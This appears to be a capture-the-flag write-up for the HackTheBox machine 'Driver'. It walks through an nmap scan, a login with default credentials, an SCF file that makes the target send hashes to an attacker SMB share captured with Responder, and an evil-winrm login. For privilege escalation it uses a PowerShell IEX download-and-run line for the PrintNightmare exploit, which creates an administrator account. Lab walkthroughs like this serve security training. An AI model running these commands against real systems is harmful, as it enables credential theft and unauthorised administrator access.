So today we are come with another challenge from “HackTheBox” called “Driver” which is based on the exploitation of Print Nightmare Vulnerability . So without wasting time let start the journey.
Level : Medium
Attacking Strategy
- Networking Scanning
- Nmap
- Enumeration
- Web application enumeration
- Upload functionality
- Exploitation
- SCF attack
- Privilege Escalation
- Print Nightmare Vulnerability
Walkthrough
IP Addresses : 10.10.11.106
We start with Nmap scan which reveals the open port and services on target here port 80 HTTP , 445 SMB , 5985 Winrm (window remote management ) are open.
nmap -p- -sC -sV --min-rate 10000 -oN nmap 10.10.11.106
Nmap scan report for 10.10.11.106
Host is up (0.093s latency).
Not shown: 65531 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h30m00s, deviation: 0s, median: 1h30m00s
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-10-17T18:59:32
|_ start_date: 2021-10-17T12:44:47
Enumeration
Port 80 looks interesting as there is some kind of authentication , after visiting the http service there is a pop which is asking for password to access the service.

Now we didn’t have any username or password so first think come in mind is brute force but then we think let try some default credentials and it worked the valid credentials are “admin:admin” and we are in.

After login successfully we start further enumeration after some time there is an option to upgrade the firmware and there is upload functionality so we try to upload some shells but no success but there is some interesting message is shown when we submit i.e. successful submission of payload .

Exploitation
For some time we stuck here but after taking break we come with theory i.e. can we try SCF attack as SMB service is also running so we can give a try to this attack. To perform this attack we have to create file with extension @scfattack and inside this file we have to write some code .
Note : Change the IP address (attacker IP)
[Shell]
Command=2
IconFile=\\10.10.14.94\Share\test.ico
[Taskbar]
Command=ToggleDesktop
Once the payload is ready we upload the server and we have to run the responder to grab the hash.
resonder -I tun0

And here we got the hash for tony user after breaking the hash we got the password for tony user and now we have valid username and password i.e. “Tony : liltony” .

From the credentials we make the login over winrm port 5985 and collect the user flag.
evil-winrm -i 10.10.11.106 -u tony -p liltony

Privilege Escalation
Let’s utilize the credential we enumerated for user tony but didn’t get anything after sometime we start enumerating for SMB service and other service and we get something Jussy as print system remote protocol is there so we can try exploiting printnighmare vulnerability which is also know as Windows Print Spooler Remote Code Execution Vulnerability as defined by Microsoft.
rpcdump.py @10.10.11.106 | grep MS-RPRN

To exploit this vulnerability we are going to use PowerShell based exploit which you get from GitHub . This exploit will create the new user with local administrator privileges.
git clone https://github.com/calebstewart/CVE-2021-1675.git
cd CVE-2021-1675
python -m SimpleHTTPServer
IEX(New-Object Net.WebClient).downloadstring('http://10.10.14.81:8000/CVE-2021-1675.ps1')
Invoke-Nightmare -NewUser "pentestsky" -Newpassword "pentestsky"
evil-winrm -i 10.10.11.106 -u pentestsky -p pentestsky
type "C:\Users\Administrators\Desktop\root.txt"

Finally we are administrator and collect the flag.
References
- SMB Share – SCF File Attacks – Penetration Testing Lab
- CVE-2021-1675 – Security Update Guide – Microsoft – Windows Print Spooler Remote Code Execution Vulnerability
- GitHub – calebstewart/CVE-2021-1675: Pure PowerShell implementation of CVE-2021-1675 Print Spooler Local Privilege Escalation (PrintNightmare)